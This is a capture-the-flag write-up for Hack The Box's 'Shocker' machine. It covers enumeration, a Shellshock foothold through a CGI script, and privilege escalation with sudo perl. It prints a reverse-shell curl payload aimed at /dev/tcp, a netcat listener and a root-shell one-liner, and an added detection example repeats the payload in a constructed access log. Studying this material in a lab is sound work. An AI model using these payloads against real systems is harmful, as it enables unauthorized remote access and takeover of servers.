HTB - Shocker
Linux | Shellshock
Tools For This Box
Shellshock (CVE-2014-6271) - Vulnerability - exploits Bash's tendency to execute the commands that trail a function definition stored in an environment variable. Anything that places attacker-controlled input into a Bash process's environment is therefore a remote vector; the classic case is a web server running Bash CGI scripts, which is exactly what this box has - OWASP presentation
TL;DR / Executive Summary
Scan and enumerate with nmap and gobuster
Gain a foothold with Shellshock through a script in /cgi-bin/
Privesc by running perl through sudo
Scanning & Enumeration
We kick it off with our favorite nmap and gobuster scans.
nmap
nmap -sV -sC -vv <IP>
These ports are open to us:
80: HTTP
2222: SSH (note the non-standard port)

Browsing to port 80 gives us this page:

Downloading the page's .jpg and running steghide on it doesn't yield anything, so there is no steganography rabbit hole here.
gobuster
gobuster dir -u http://<IP> -w <wordlist>
Using the common.txt wordlist, we get the following results:

Most of the results are pretty standard, but the /cgi-bin/ directory is unusual. Let's check it out. Do note the trailing "/" on /cgi-bin/: Apache's ScriptAlias for the CGI directory only matches the path with the slash, so a request for /cgi-bin without it returns a 404, and wordlists that omit the slash miss the directory entirely.

Unfortunately, we are met with a 403 Forbidden error.
Since we've explored the webpage and there does not appear to be another avenue, let's find out more about /cgi-bin/.
A CGI-bin is a folder used to house scripts that will interact with a Web browser to provide functionality for a Web page or website. - Techopedia
Now that we know it's a folder containing scripts, and that the 403 only means directory listing is denied rather than the scripts themselves being blocked, let's enumerate script names inside it. We'll use gobuster with the -x flag to append common script extensions to each word.
gobuster dir -u http://<IP>/cgi-bin/ -w <wordlist> -x php,sh,py,rb
We quickly get a hit on /cgi-bin/user.sh.

Browsing to it starts a download of the user.sh script. We open it to find:

Gaining Foothold
At this point, we know there's a Bash script served from /cgi-bin/, but we need a way to use it to get a reverse shell. Turning to trusty Google, we get results for the vulnerability called "Shellshock", which aligns with the name of the box.

Digging into what the Shellshock vulnerability is:
"Shellshock is a security bug causing Bash to execute commands from environment variables unintentionally." - Netsparker
Additionally, the second Google result gives us a way to exploit this to get a reverse shell. First we get our netcat listener up and running:
nc -lvnp 4444
Now to execute and get our shell. The payload goes in the User-Agent header (curl -A) because Apache's CGI module exports every request header to the script as an HTTP_* environment variable (here HTTP_USER_AGENT). When user.sh starts, the vulnerable Bash sees a value beginning with "() {", imports it as a function definition, and then keeps executing whatever follows the closing brace, in our case the reverse shell.
curl -A "() { :; }; /bin/bash -i > /dev/tcp/<ourIP>/4444 0<&1 2>&1" http://<victimIP>/cgi-bin/user.sh
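The mechanism behind that one-liner, as an added example that is not part of the original write-up: the script below emulates locally what Apache's mod_cgi does with the User-Agent header (exports it as HTTP_USER_AGENT and starts bash on the script), probes whether the local bash still imports a function from it the Shellshock way, and then shows what the same request looks like in the server's access log for detection. The stand-in CGI script, the 10.10.14.2 address and the log lines are constructed for the example.

```bash
#!/usr/bin/env bash
# Added example, not code from the original write-up. Emulates the CGI side
# of Shellshock locally and shows the matching access-log trace.
# The stand-in CGI script and the log lines below are constructed.

WORKDIR="$(mktemp -d)"
trap 'rm -rf "$WORKDIR"' EXIT

# Stand-in for /cgi-bin/user.sh (constructed, not the box's real script).
# Any bash-interpreted CGI script will do: the bug triggers while bash
# imports its environment, before the script's first line runs.
cat > "$WORKDIR/user.sh" <<'EOF'
#!/bin/bash
echo "Content-Type: text/plain"
echo
echo "Just an uptime test script"
EOF

# Emulate one CGI request. mod_cgi turns the request header
# "User-Agent: <value>" into the environment variable HTTP_USER_AGENT=<value>
# and executes the script, so the header value reaches bash's startup code.
cgi_request() {
  user_agent="$1"
  env -i PATH="$PATH" HTTP_USER_AGENT="$user_agent" REQUEST_METHOD=GET \
      SCRIPT_NAME=/cgi-bin/user.sh bash "$WORKDIR/user.sh" 2>&1
}

# Shellshock probe: "() { :; }" is an empty function definition. A vulnerable
# bash parses it as a function import and then keeps executing the trailing
# "echo SHOCKED", so the marker shows up in the CGI output. A patched bash
# imports the variable as plain text and the marker never appears.
shellshock_probe() {
  case "$(cgi_request '() { :; }; echo SHOCKED')" in
    *SHOCKED*) echo vulnerable ;;
    *)         echo patched ;;
  esac
}

# Detection side: Apache logs the User-Agent verbatim, so the payload is
# visible in the access log. Constructed lines mirroring the enumeration
# (403 on /cgi-bin/) and the exploitation request (200 on the script).
ACCESS_LOG="$WORKDIR/access.log"
cat > "$ACCESS_LOG" <<'EOF'
10.10.14.2 - - [12/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 137 "-" "Mozilla/5.0"
10.10.14.2 - - [12/Jan/2024:10:00:05 +0000] "GET /cgi-bin/ HTTP/1.1" 403 292 "-" "gobuster/3.6"
10.10.14.2 - - [12/Jan/2024:10:00:09 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; /bin/bash -i > /dev/tcp/10.10.14.2/4444 0<&1 2>&1"
EOF

# Count requests whose User-Agent carries a function definition. The regex
# tolerates the optional whitespace seen in real traffic ("() {" and "(){").
count_shellshock_hits() {
  grep -cE '\(\) *\{' "$1" || true
}

# Print the offending lines so an analyst sees source IP and target path.
show_shellshock_hits() {
  grep -E '\(\) *\{' "$1" || true
}

echo "local bash: $(shellshock_probe)"
echo "shellshock requests in log: $(count_shellshock_hits "$ACCESS_LOG")"
show_shellshock_hits "$ACCESS_LOG"
```

On a current system the probe prints "patched"; only an unpatched 2014-era bash prints "vulnerable". Note that the page's reverse-shell payload never needs to return anything over HTTP, which is why it works without the "echo; echo" prefix that blind command-output probes use to terminate the CGI response headers.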

We have a winner! We've got a shell:

After a bit of poking around, we find the user.txt:

Privilege Escalation
We run the usual gamut of simple privesc checks, such as bash history, SUID binaries, etc., but none of them yields anything useful.
Let's see what commands we can run with sudo, using sudo -l.

Nice. Looks like we can run perl with sudo. Now to hop over to GTFOBins to see how we can use this to escalate our privileges. We get the following command:
sudo perl -e 'exec "/bin/sh";'
Running this in our shell grants us root: sudo starts perl as root, and perl's exec replaces that process with /bin/sh, which keeps the root privileges.

Finally, let's claim our flag:
